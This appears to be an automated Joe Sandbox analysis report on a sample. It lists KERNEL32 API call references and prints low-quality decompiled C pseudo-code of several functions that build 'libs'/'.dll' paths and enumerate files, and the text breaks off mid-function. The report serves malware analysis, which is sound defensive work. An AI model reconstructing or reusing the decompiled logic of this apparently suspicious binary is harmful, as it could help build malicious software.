LocalAlloc.KERNEL32(00000040,00000000), ref: 00405698
LocalAlloc.KERNEL32(00000040,00000000), ref: 004056EC
LocalAlloc.KERNEL32(00000040,00000000), ref: 00405740
LocalAlloc.KERNEL32(00000040,00000000), ref: 00405794
LocalAlloc.KERNEL32(00000040,00000000), ref: 004057F1
LocalAlloc.KERNEL32(00000040,00000000), ref: 0040584C
LocalAlloc.KERNEL32(00000040,00028000), ref: 00405894

Part of subcall function 00405FEB: lstrlenW.KERNEL32(004E5BE0,?,?,?,?,?,?,?,?,?,?,?,004058D7,?,?,?), ref: 00406137

LocalFree.KERNEL32(00000000), ref: 004059AC
LocalFree.KERNEL32(?), ref: 004059B5
LocalFree.KERNEL32(?), ref: 004059BE
LocalFree.KERNEL32(?), ref: 004059C5

Part of subcall function 00407EDB: LocalAlloc.KERNEL32(00000040,0000C350,?,00000000,00000001,?,?,?,?,?,00409B89,00000001,?,00000000,00000000,?), ref: 00407EF5
Part of subcall function 00407EDB: LocalAlloc.KERNEL32(00000040,?,?,?,?,?,?,00409B89,00000001,?,00000000), ref: 00407F9B

LocalFree.KERNELBASE(00000000), ref: 004059CF
LocalFree.KERNEL32(00407BAF), ref: 004059D8
LocalFree.KERNEL32(?), ref: 004059E1
LocalFree.KERNEL32(?), ref: 004059EA
LocalFree.KERNEL32(?), ref: 004059F3
LocalFree.KERNEL32(?), ref: 004059FC
LocalFree.KERNEL32(?), ref: 00405A05
LocalFree.KERNEL32(?), ref: 00405A0E
LocalFree.KERNEL32(?), ref: 00405A17

Part of subcall function 0040A503: lstrlenW.KERNEL32(?,00000000,?,00000000,00000000,?,00408633), ref: 0040A516
Part of subcall function 0040A503: lstrlenW.KERNEL32(?,?,00000000,?,00000000,00000000,?,00408633), ref: 0040A51D
Part of subcall function 0040A503: LocalAlloc.KERNEL32(00000040,00000000,?,00000000,?,00000000,00000000,?,00408633), ref: 0040A533
Part of subcall function 0040A503: GlobalFree.KERNEL32(?), ref: 0040A550

Part of subcall function 00408619: LocalAlloc.KERNEL32(00000040,0000FF78,00000000,00407870), ref: 00408628

LocalFree.KERNEL32(00407BAF,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00407BAF), ref: 00405A40
LocalFree.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00407BAF), ref: 00405A49
LocalFree.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00407BAF), ref: 00405A52
LocalFree.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00407BAF), ref: 00405A5B
LocalFree.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00407BAF), ref: 00405A64
LocalFree.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00407BAF), ref: 00405A6D
LocalFree.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00407BAF), ref: 00405A76
LocalFree.KERNEL32(00407BAF,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00407BAF), ref: 00405A85
LocalFree.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00407BAF), ref: 00405A8E
LocalFree.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00407BAF), ref: 00405A97
LocalFree.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00407BAF), ref: 00405AA0
LocalFree.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00407BAF), ref: 00405AA9
LocalFree.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00407BAF), ref: 00405AB0
LocalFree.KERNEL32(00407BAF,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00407BAF), ref: 00405AC1
LocalFree.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00407BAF), ref: 00405ACA
LocalFree.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00407BAF), ref: 00405AD3
LocalFree.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00407BAF), ref: 00405ADC
LocalFree.KERNEL32(00407BAF,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00407BAF), ref: 00405AE5
LocalFree.KERNEL32(00407BAF,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00407BAF), ref: 00405AF3
LocalFree.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00407BAF), ref: 00405AFC
LocalFree.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00407BAF), ref: 00405B05
LocalFree.KERNEL32(00407BAF,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00407BAF), ref: 00405B16
LocalFree.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00407BAF), ref: 00405B1F
LocalFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00407BAF), ref: 00405B26
LocalFree.KERNEL32(00407BAF,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00407BAF), ref: 00405B37

Memory Dump Source

Source File: 00000014.00000002.439745303.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000014.00000002.440168036.0000000000410000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_400000_F0geI.jbxd

Yara matches

Similarity

API ID: Local$Free$Alloc$lstrlen$Global
String ID:
API String ID: 2107727554-0
Opcode ID: 1c60b24231b25f616e40e6fb9721cc66f7a2b7ed1654eea12d62df99302760ad
Instruction ID: f35946c0f576b0545b5d2f7ca60a1d17271964e093f6211ee75f8335e655f3b5
Opcode Fuzzy Hash: 1c60b24231b25f616e40e6fb9721cc66f7a2b7ed1654eea12d62df99302760ad
Instruction Fuzzy Hash: E1F1C372900225EFDB149BA6DE48EAEBB75EB48310F044535F905B32A0DB746D21CFA9

Uniqueness

Uniqueness Score: -1.00%

Function 0040864C Relevance: 33.2, APIs: 18, Strings: 4, Instructions: 247
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 58%

			E0040864C(void* __ecx, intOrPtr __edx) {
				void* _v8;
				void* _v12;
				void* _v16;
				void* _v20;
				void* _v24;
				signed int _v28;
				intOrPtr _v32;
				void* _t47;
				void* _t55;
				void* _t61;
				void* _t64;
				void* _t73;
				void* _t74;
				signed int _t81;
				void* _t83;
				void* _t90;
				signed int _t91;
				void* _t100;
				void* _t101;
				void* _t103;
				signed int _t104;
				void* _t106;
				void* _t107;
				signed int _t111;
				void* _t112;
				void* _t113;
				void* _t115;
				void* _t122;
				signed int _t137;
				intOrPtr _t146;
				void* _t150;
				void* _t152;

				_t115 = __ecx;
				_v32 = __edx;
				_t47 = LocalAlloc(0x40,  *((intOrPtr*)( *0x40e08c))(__ecx) + _t45); // executed
				_t152 = _t47;
				_push(_t115);
				_v12 = _t152;
				if( *((intOrPtr*)( *0x40e08c))() == 0x26) {
					L25:
					if(_t152 != 0) {
						LocalFree(_t152); // executed
					}
					return 1;
				} else {
					goto L1;
				}
				do {
					L1:
					_t55 = LocalAlloc(0x40,  *((intOrPtr*)( *0x40e08c))(_t115) + _t53); // executed
					_v8 = _t55;
					_t150 = LocalAlloc(0x40,  *((intOrPtr*)( *0x40e08c))(_t115) + _t56);
					_v16 = _t150;
					_t61 = LocalAlloc(0x40,  *((intOrPtr*)( *0x40e08c))(_t115) + _t59);
					_t152 = _t61;
					_v24 = _t152;
					_t122 =  *((intOrPtr*)( *0x40e18c))(_t115,  *0x40e1ec);
					_t63 = 0;
					_v28 = 0;
					if(_t122 == 0) {
						L3:
						_t8 =  &_v8; // 0x4079e3
						_t64 = E0040A3E4(_t115, _t8, 0, _t63); // executed
						if(_t64 != 1) {
							goto L17;
						}
						_t73 =  *((intOrPtr*)( *0x40e18c))(_t115,  *0x40e228);
						_v20 = _t73;
						if(_t73 == 0) {
							_t74 = _v12;
							if(_t74 != 0) {
								LocalFree(_t74);
							}
							if(_v8 != 0) {
								LocalFree(_v8);
							}
							if(_t150 != 0) {
								LocalFree(_t150);
							}
							goto L25;
						}
						_push(L"libs");
						_t10 =  &_v8; // 0x4079e3
						_push( *_t10);
						if( *((intOrPtr*)( *0x40e114))() != 0) {
							goto L17;
						}
						_t115 = _t115 + _v28 * 2 + 2;
						_t81 = _v20 - _t115;
						_v20 = _t81 >> 1;
						if(_t81 == 0) {
							L33:
							_t83 = _v12;
							if(_t83 != 0) {
								LocalFree(_t83);
							}
							if(_v8 == 0) {
								L38:
								if(_t150 != 0) {
									LocalFree(_t150);
								}
								if(_t152 != 0) {
									LocalFree(_t152);
								}
								return 0;
							} else {
								LocalFree(_v8);
								L37:
								goto L38;
							}
						}
						_t90 =  *((intOrPtr*)( *0x40e18c))(_t115,  *0x40e1f0);
						if(_t90 == 0) {
							goto L33;
						}
						_t91 = _t90 - _t115;
						_t92 = _t91 >> 1;
						_v28 = _t91 >> 1;
						if(_t91 == 0) {
							goto L33;
						}
						if(E0040A3E4(_t115,  &_v16, 0, _t92) == 0) {
							L16:
							_t150 = _v16;
							goto L17;
						}
						if(E0040A3E4(_t115,  &_v24, _v28 + 1, _v20) == 0) {
							_t152 = _v24;
							goto L16;
						}
						_t100 = E0040A503( *((intOrPtr*)( *0x40e044))(0x40, 0x208), _v32);
						_t146 =  *0x40e258; // 0x4e5d00
						_t101 = E0040A503(_t100, _t146);
						_t150 = _v16;
						_t103 = E0040A503(E0040A503(_t101, _t150), L".dll");
						_t137 =  *0x40e374; // 0x4fe2a0
						_v28 = _t137;
						_v20 = _t103;
						_t104 = E00408619( &_v28);
						_t152 = _v24;
						_v28 = _t104;
						E00408495(_t152, _t104, _t103); // executed
						_t106 = _v28;
						if(_t106 != 0) {
							LocalFree(_t106);
						}
						_t107 = _v20;
						if(_t107 != 0) {
							LocalFree(_t107);
						}
						goto L17;
					}
					_t111 = _t122 - _t115;
					_t63 = _t111 >> 1;
					_v28 = _t111 >> 1;
					if(_t111 < 0) {
						_t112 = _v12;
						if(_t112 != 0) {
							LocalFree(_t112);
						}
						_t37 =  &_v8; // 0x4079e3
						_t113 =  *_t37;
						if(_t113 == 0) {
							goto L38;
						} else {
							LocalFree(_t113);
							goto L37;
						}
					}
					goto L3;
					L17:
					if(_v8 != 0) {
						LocalFree(_v8);
					}
					if(_t150 != 0) {
						LocalFree(_t150);
					}
					if(_t152 != 0) {
						LocalFree(_t152); // executed
					}
					_t34 =  *((intOrPtr*)( *0x40e18c))(_t115,  *0x40e228) + 2; // 0x2
					_t115 = _t34;
					_push(_t115);
				} while ( *((intOrPtr*)( *0x40e08c))() != 0x26);
				_t152 = _v12;
				goto L25;
			}

0x0040865f
0x00408663
0x0040866d
0x00408675
0x00408677
0x00408678
0x00408680
0x00408888
0x0040888a
0x0040888d
0x0040888d
0x00000000
0x00000000
0x00000000
0x00000000
0x00408686
0x00408686
0x00408699
0x004086a8
0x004086ba
0x004086c3
0x004086cd
0x004086db
0x004086de
0x004086e3
0x004086e5
0x004086e7
0x004086ec
0x004086fd
0x00408700
0x00408705
0x0040870f
0x00000000
0x00000000
0x00408721
0x00408723
0x00408728
0x004088ea
0x004088ef
0x004088f2
0x004088f2
0x004088fc
0x00408901
0x00408901
0x00408909
0x00408910
0x00408910
0x00000000
0x00408909
0x00408734
0x00408739
0x00408739
0x00408740
0x00000000
0x00000000
0x0040874f
0x00408752
0x00408756
0x00408759
0x004088b3
0x004088b3
0x004088b8
0x004088bb
0x004088bb
0x004088c5
0x004088d0
0x004088d2
0x004088d5
0x004088d5
0x004088dd
0x004088e0
0x004088e0
0x00000000
0x004088c7
0x004088ca
0x004088ca
0x00000000
0x004088ca
0x004088c5
0x0040876b
0x0040876f
0x00000000
0x00000000
0x00408775
0x00408777
0x00408779
0x0040877c
0x00000000
0x00000000
0x00408793
0x0040883b
0x0040883b
0x00000000
0x0040883b
0x004087b0
0x00408838
0x00000000
0x00408838
0x004087c9
0x004087ce
0x004087d6
0x004087db
0x004087ee
0x004087f3
0x004087fb
0x00408801
0x00408804
0x0040880a
0x00408811
0x00408814
0x00408819
0x0040881f
0x00408822
0x00408822
0x00408828
0x0040882d
0x00408830
0x00408830
0x00000000
0x0040882d
0x004086f0
0x004086f2
0x004086f4
0x004086f7
0x0040889b
0x004088a0
0x004088a3
0x004088a3
0x004088a9
0x004088a9
0x004088ae
0x00000000
0x004088b0
0x004088ca
0x00000000
0x004088ca
0x004088ae
0x00000000
0x0040883e
0x00408842
0x00408847
0x00408847
0x0040884f
0x00408852
0x00408852
0x0040885a
0x0040885d
0x0040885d
0x00408871
0x00408871
0x00408879
0x0040887c
0x00408885
0x00000000

APIs

LocalAlloc.KERNEL32(00000040,00000000,?,?,?,?,?,?,004079E3), ref: 0040866D
LocalAlloc.KERNEL32(00000040,00000000,?,?,?,?,?,?,004079E3), ref: 00408699
LocalAlloc.KERNEL32(00000040,00000000,?,?,?,?,?,?,004079E3), ref: 004086B2
LocalAlloc.KERNEL32(00000040,00000000,?,?,?,?,?,?,004079E3), ref: 004086CD
LocalFree.KERNEL32(?,?,?,?,?,?,?,004079E3), ref: 00408822
LocalFree.KERNEL32(?,?,?,?,?,?,?,004079E3), ref: 00408830
LocalFree.KERNEL32(00000000), ref: 00408847
LocalFree.KERNEL32(00000000), ref: 00408852
LocalFree.KERNELBASE(00000000), ref: 0040885D
LocalFree.KERNELBASE(00000000,?,?,?,?,?,?,004079E3), ref: 0040888D
LocalFree.KERNEL32(?,?,?,?,?,?,?,004079E3), ref: 004088A3
LocalFree.KERNEL32(?,?,?,?,?,?,?,004079E3), ref: 004088BB
LocalFree.KERNEL32(00000000,?,?,?,?,?,?,004079E3), ref: 004088CA
LocalFree.KERNEL32(00000000,?,?,?,?,?,?,004079E3), ref: 004088D5
LocalFree.KERNEL32(00000000,?,?,?,?,?,?,004079E3), ref: 004088E0
LocalFree.KERNEL32(?,?,?,?,?,?,?,004079E3), ref: 004088F2
LocalFree.KERNEL32(00000000), ref: 00408901
LocalFree.KERNEL32(00000000), ref: 00408910

Strings

libs, xrefs: 00408734
y@, xrefs: 004088FE, 00408844
.dll, xrefs: 004087E7
y@, xrefs: 00408700, 00408739, 004088A9, 004088B0

Memory Dump Source

Source File: 00000014.00000002.439745303.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000014.00000002.440168036.0000000000410000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_400000_F0geI.jbxd

Yara matches

Similarity

API ID: Local$Free$Alloc
String ID: .dll$libs$y@$y@
API String ID: 3098330729-564368970
Opcode ID: b6baaf1c4c7f1a018e7c964b8c0473864a6ac247d4e3265520aa8e21be5a1454
Instruction ID: 52a9afaef70bc3ab584d26b5193ec900674cb85d6b4cf00b99d66efe4c6f1661
Opcode Fuzzy Hash: b6baaf1c4c7f1a018e7c964b8c0473864a6ac247d4e3265520aa8e21be5a1454
Instruction Fuzzy Hash: EE818672A002159BDB04EFA5DF85A6E77B8AB44310B44483EE941F7390DF78ED11CB69

Uniqueness

Uniqueness Score: -1.00%

Function 0040A7DA Relevance: 31.6, APIs: 25, Instructions: 347
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 30%

			E0040A7DA(short* __edx) {
				void* _v8;
				void* _v12;
				void* _v16;
				void* _v20;
				void* _v24;
				intOrPtr _v28;
				void* _v32;
				signed int _v36;
				void* _v40;
				void* _v44;
				short* _v48;
				void* _v52;
				intOrPtr _v56;
				signed int _v60;
				char _v64;
				void* __ecx;
				void* _t80;
				signed int _t81;
				void* _t84;
				void* _t88;
				void* _t91;
				void* _t94;
				void* _t116;
				void* _t120;
				void* _t136;
				void* _t139;
				void* _t145;
				void* _t146;
				void* _t147;
				void* _t149;
				void* _t150;
				void* _t161;
				void* _t162;
				void* _t163;
				intOrPtr _t164;
				char _t206;
				void* _t219;
				void* _t228;
				signed int _t231;
				intOrPtr _t232;
				void* _t235;
				void* _t242;
				signed int _t246;
				signed int _t249;
				void* _t250;
				void* _t251;
				void* _t253;
				void* _t254;

				_v48 = __edx;
				_v28 = _t164;
				_t161 =  *((intOrPtr*)( *0x40e18c))(_t164,  *0x40e2a4);
				if(_t161 == 0) {
					L24:
					return 0;
				}
				while(1) {
					_t162 = _t161 + 0xa;
					_t80 =  *((intOrPtr*)( *0x40e18c))(_t162,  *0x40e1f0);
					_t3 = _t80 + 2; // 0x2
					_t224 = _t3;
					_t81 =  *((intOrPtr*)( *0x40e18c))(_t3,  *0x40e1e8);
					_v36 = _t81;
					_t84 = LocalAlloc(0x40,  *((intOrPtr*)( *0x40e08c))(_v28) + _t82);
					_v8 = _t84;
					_t88 = LocalAlloc(0x40,  *((intOrPtr*)( *0x40e08c))(_v28) + _t86);
					_v12 = _t88;
					_t91 = LocalAlloc(0x40,  *((intOrPtr*)( *0x40e08c))(_v28) + _t89);
					_v16 = _t91;
					_t94 = LocalAlloc(0x40,  *((intOrPtr*)( *0x40e08c))(_v28) + _t92);
					_v20 = _t94;
					_t242 = LocalAlloc(0x40,  *((intOrPtr*)( *0x40e08c))(_v28) + _t95);
					_t100 = _v36 - _t162 >> 1;
					_v24 = _t242;
					_v44 = _v36 - _t162 >> 1;
					if(E0040A3E4(_t162,  &_v8, _t224 - _t162 >> 1, _t100) == 0) {
						break;
					}
					_t228 =  *((intOrPtr*)( *0x40e18c))(_v36 + 2,  *0x40e1e8);
					_t246 = _t228 - _t162 >> 1;
					if(E0040A3E4(_t162,  &_v12, _v44 + 1, _t246) == 0) {
						L20:
						LocalFree(_v8);
						LocalFree(_v12);
						LocalFree(_v16);
						LocalFree(_v20);
						LocalFree(_v24);
						L22:
						L23:
						goto L24;
					}
					_t21 = _t228 + 2; // 0x2
					_t116 =  *((intOrPtr*)( *0x40e18c))(_t21,  *0x40e1e8);
					_v44 = _t116;
					_t23 = _t246 + 1; // 0x1
					_t231 = _t116 - _t162 >> 1;
					if(E0040A3E4(_t162,  &_v16, _t23, _t231) == 0) {
						goto L20;
					}
					_t120 =  *((intOrPtr*)( *0x40e18c))(_v44 + 2,  *0x40e1e8);
					_v44 = _t120;
					_t27 = _t231 + 1; // 0x1
					_t249 = _t120 - _t162 >> 1;
					if(E0040A3E4(_t162,  &_v20, _t27, _t249) == 0) {
						goto L20;
					}
					_t232 =  *((intOrPtr*)( *0x40e18c))(_v44 + 2,  *0x40e228);
					_v56 = _t232;
					_t32 = _t249 + 1; // 0x1
					if(E0040A3E4(_t162,  &_v24, _t32, _t232 - _t162 >> 1) == 0) {
						goto L20;
					}
					_t250 =  *((intOrPtr*)( *0x40e074))(_v12);
					if(_t250 > 0) {
						_t163 =  *((intOrPtr*)( *0x40e044))(0x40, 0x20a);
						_t136 =  *((intOrPtr*)( *0x40e0c4))(0, _t163, _t250, 0); // executed
						if(_t136 != 0) {
							_t139 =  *((intOrPtr*)( *0x40e000))(_t163, _t163, _v16);
							_v36 = _v36 & 0x00000000;
							_t163 = _t139;
							_v32 =  *((intOrPtr*)( *0x40e044))(0x40, 0x2000);
							E0040B177(_v8, _t163, _t163, _v20, _v24, _t141,  &_v36); // executed
							_t254 = _t254 + 0x14;
							if(_v36 <= 0) {
								_t251 = _v32;
							} else {
								_t145 =  *((intOrPtr*)( *0x40e044))(0x40, 0x208);
								_t146 =  *((intOrPtr*)( *0x40e044))(0x40, 0x208);
								_t219 = 0x10;
								_t147 = E0040A05F(_t145, _t219);
								_t253 = _t147;
								_v52 = _t253;
								_t149 = E0040A503( *((intOrPtr*)( *0x40e13c))(_t146,  *0x40e210), _t253);
								_t206 =  *0x40e204; // 0x4e5e00
								_v60 = _v60 & 0x00000000;
								_v64 = _t206;
								_v44 = _t149;
								_t150 = E00408619( &_v44);
								_v40 = _t150;
								_t235 =  *((intOrPtr*)( *0x40e044))(0x40, 0x184);
								 *((intOrPtr*)( *0x40e0e4))(0xfde9, 0, _t253, 0xffffffff, 0, 0, 0, 0);
								if(0 == 0) {
									_t251 = _v32;
								} else {
									 *((intOrPtr*)( *0x40e0e4))(0xfde9, 0, _t253, 0xffffffff, _t235, 0, 0, 0);
									_t251 = _v32;
									if(0 != 0) {
										E00407EDB(_v48, _t235, 0, 0, _v36, _t251, _v40,  &_v64);
										_t254 = _t254 + 0x18;
									}
								}
								LocalFree(_t235);
								LocalFree(_v40);
								LocalFree(_v44);
								LocalFree(_v52);
								_t232 = _v56;
							}
							LocalFree(_t251);
						}
						LocalFree(_t163);
					}
					LocalFree(_v8);
					LocalFree(_v12);
					LocalFree(_v16);
					LocalFree(_v20);
					LocalFree(_v24);
					_t66 = _t232 + 2; // 0x2
					_t161 =  *((intOrPtr*)( *0x40e18c))(_t66,  *0x40e2a4);
					if(_t161 != 0) {
						continue;
					} else {
						goto L23;
					}
				}
				LocalFree(_v8);
				LocalFree(_v12);
				LocalFree(_v16);
				LocalFree(_v20);
				LocalFree(_t242);
				goto L22;
			}

0x0040a7ec
0x0040a7f0
0x0040a7f5
0x0040a7f9
0x0040abd3
0x0040abd7
0x0040abd7
0x0040a801
0x0040a80c
0x0040a810
0x0040a81e
0x0040a81e
0x0040a822
0x0040a833
0x0040a83d
0x0040a848
0x0040a857
0x0040a868
0x0040a872
0x0040a883
0x0040a88d
0x0040a89e
0x0040a8aa
0x0040a8b8
0x0040a8be
0x0040a8c1
0x0040a8cd
0x00000000
0x00000000
0x0040a8ee
0x0040a8f4
0x0040a904
0x0040ab7d
0x0040ab80
0x0040ab89
0x0040ab92
0x0040ab9b
0x0040abcb
0x0040abcb
0x0040abd1
0x00000000
0x0040abd2
0x0040a916
0x0040a91a
0x0040a91e
0x0040a923
0x0040a926
0x0040a938
0x00000000
0x00000000
0x0040a951
0x0040a955
0x0040a95a
0x0040a95d
0x0040a96f
0x00000000
0x00000000
0x0040a98a
0x0040a991
0x0040a999
0x0040a9a8
0x00000000
0x00000000
0x0040a9b8
0x0040a9bc
0x0040a9d7
0x0040a9df
0x0040a9e3
0x0040a9f3
0x0040a9f5
0x0040a9f9
0x0040aa0c
0x0040aa1d
0x0040aa22
0x0040aa29
0x0040ab21
0x0040aa2f
0x0040aa3c
0x0040aa49
0x0040aa4d
0x0040aa52
0x0040aa63
0x0040aa66
0x0040aa6f
0x0040aa74
0x0040aa7a
0x0040aa7e
0x0040aa84
0x0040aa87
0x0040aa99
0x0040aaa4
0x0040aab5
0x0040aab9
0x0040aaf7
0x0040aabb
0x0040aad0
0x0040aad2
0x0040aad7
0x0040aaed
0x0040aaf2
0x0040aaf2
0x0040aad7
0x0040aafb
0x0040ab04
0x0040ab0d
0x0040ab16
0x0040ab1c
0x0040ab1c
0x0040ab25
0x0040ab25
0x0040ab2c
0x0040ab2c
0x0040ab35
0x0040ab3e
0x0040ab47
0x0040ab50
0x0040ab59
0x0040ab6b
0x0040ab71
0x0040ab75
0x00000000
0x0040ab7b
0x00000000
0x0040ab7b
0x0040ab75
0x0040aba9
0x0040abb2
0x0040abbb
0x0040abc4
0x0040abcb
0x00000000

APIs

LocalAlloc.KERNEL32(00000040,00000000), ref: 0040A83D
LocalAlloc.KERNEL32(00000040,00000000), ref: 0040A857
LocalAlloc.KERNEL32(00000040,00000000), ref: 0040A872
LocalAlloc.KERNEL32(00000040,00000000), ref: 0040A88D
LocalAlloc.KERNEL32(00000040,00000000), ref: 0040A8A8

Part of subcall function 0040A3E4: LocalAlloc.KERNEL32(00000040,00000000,?,0040870A,00000000,00000000,?,?,?,?,?,?,004079E3), ref: 0040A40C
Part of subcall function 0040A3E4: LocalFree.KERNEL32(00000000,?,0040870A,00000000,00000000,?,?,?,?,?,?,004079E3), ref: 0040A449

LocalFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00407B9D), ref: 0040AB2C

Part of subcall function 0040B177: FindFirstFileW.KERNEL32(00000000,?), ref: 0040B1D0
Part of subcall function 0040B177: LocalFree.KERNEL32(00000000), ref: 0040B25D
Part of subcall function 0040B177: LocalFree.KERNEL32(?), ref: 0040B4D9
Part of subcall function 0040B177: FindClose.KERNEL32(00000000), ref: 0040B4E0

LocalFree.KERNEL32(?), ref: 0040AB25

Part of subcall function 0040A503: lstrlenW.KERNEL32(?,00000000,?,00000000,00000000,?,00408633), ref: 0040A516
Part of subcall function 0040A503: lstrlenW.KERNEL32(?,?,00000000,?,00000000,00000000,?,00408633), ref: 0040A51D
Part of subcall function 0040A503: LocalAlloc.KERNEL32(00000040,00000000,?,00000000,?,00000000,00000000,?,00408633), ref: 0040A533
Part of subcall function 0040A503: GlobalFree.KERNEL32(?), ref: 0040A550

Part of subcall function 00408619: LocalAlloc.KERNEL32(00000040,0000FF78,00000000,00407870), ref: 00408628

LocalFree.KERNEL32(00000000), ref: 0040AAFB
LocalFree.KERNEL32(?), ref: 0040AB04
LocalFree.KERNEL32(?), ref: 0040AB0D
LocalFree.KERNEL32(?), ref: 0040AB16

Part of subcall function 00407EDB: LocalAlloc.KERNEL32(00000040,0000C350,?,00000000,00000001,?,?,?,?,?,00409B89,00000001,?,00000000,00000000,?), ref: 00407EF5
Part of subcall function 00407EDB: LocalAlloc.KERNEL32(00000040,?,?,?,?,?,?,00409B89,00000001,?,00000000), ref: 00407F9B

LocalFree.KERNEL32(00407B9D,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00407B9D), ref: 0040AB35
LocalFree.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00407B9D), ref: 0040AB3E
LocalFree.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00407B9D), ref: 0040AB47
LocalFree.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00407B9D), ref: 0040AB50
LocalFree.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00407B9D), ref: 0040AB59
LocalFree.KERNEL32(00407B9D,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00407B9D), ref: 0040AB80
LocalFree.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00407B9D), ref: 0040AB89
LocalFree.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00407B9D), ref: 0040AB92
LocalFree.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00407B9D), ref: 0040AB9B
LocalFree.KERNEL32(00407B9D,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00407B9D), ref: 0040ABA9
LocalFree.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00407B9D), ref: 0040ABB2
LocalFree.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00407B9D), ref: 0040ABBB
LocalFree.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00407B9D), ref: 0040ABC4
LocalFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00407B9D), ref: 0040ABCB

Memory Dump Source

Source File: 00000014.00000002.439745303.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000014.00000002.440168036.0000000000410000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_400000_F0geI.jbxd

Yara matches

Similarity

API ID: Local$Free$Alloc$Findlstrlen$CloseFileFirstGlobal
String ID:
API String ID: 2830129621-0
Opcode ID: 92e495ebd0955a2c04aae0c3d5226cfc54f8a9186c87c6867fbf46ebbbc436c8
Instruction ID: f9c1c7988c740e23ec6b3556d7cabdce8ac8e299f89005d849d6ceee94cacba7
Opcode Fuzzy Hash: 92e495ebd0955a2c04aae0c3d5226cfc54f8a9186c87c6867fbf46ebbbc436c8
Instruction Fuzzy Hash: 2DC18772900215AFDF089FA6DE45EAE7BB5EF48310F044539F905B72A0DB746D20CB69

Uniqueness

Uniqueness Score: -1.00%

Function 00409BD9 Relevance: 31.6, APIs: 25, Instructions: 303
COMMON

Download Yara Rule

C-Code - Quality: 40%

			E00409BD9(void* __ecx, short* __edx) {
				void* _v8;
				void* _v12;
				void* _v16;
				void* _v20;
				signed int _v24;
				void* _v28;
				void* _v32;
				void* _v36;
				signed int _v40;
				short* _v44;
				void* _v48;
				signed int _v52;
				char _v56;
				signed int _t60;
				void* _t62;
				void* _t71;
				void* _t78;
				void* _t85;
				void* _t92;
				void* _t94;
				signed int _t103;
				void* _t109;
				void* _t111;
				void* _t112;
				void* _t115;
				char _t116;
				void* _t117;
				void* _t127;
				void* _t140;
				signed int _t142;
				void* _t144;
				signed int _t146;
				void* _t165;
				void* _t173;
				signed int _t177;
				void* _t178;
				void* _t180;
				void* _t182;
				void* _t184;
				void* _t187;
				void* _t188;
				signed int _t193;
				signed int _t197;
				void* _t199;
				void* _t202;

				_v24 = _v24 & 0x00000000;
				_t142 = 0;
				_v44 = __edx;
				_v40 = _v40 & 0;
				_t60 =  *((intOrPtr*)( *0x40e18c))(__ecx,  *0x40e2d8);
				_t177 = _t60;
				if(_t177 == 0) {
					return _t60 | 0xffffffff;
				}
				_t178 = _t177 + 0xc;
				_t62 =  *((intOrPtr*)( *0x40e18c))(_t178,  *0x40e1f0);
				if(_t62 == 0) {
					L5:
					_v8 = LocalAlloc(0x40,  *((intOrPtr*)( *0x40e08c))(_t178, _t188) + _t64);
					if(E0040A3E4(_t178,  &_v8, 0, _t142) != 0) {
						_t180 = _t178 + _t142 * 2 + 2;
						_t71 = LocalAlloc(0x40,  *((intOrPtr*)( *0x40e08c))(_t180) + _t69);
						_v12 = _t71;
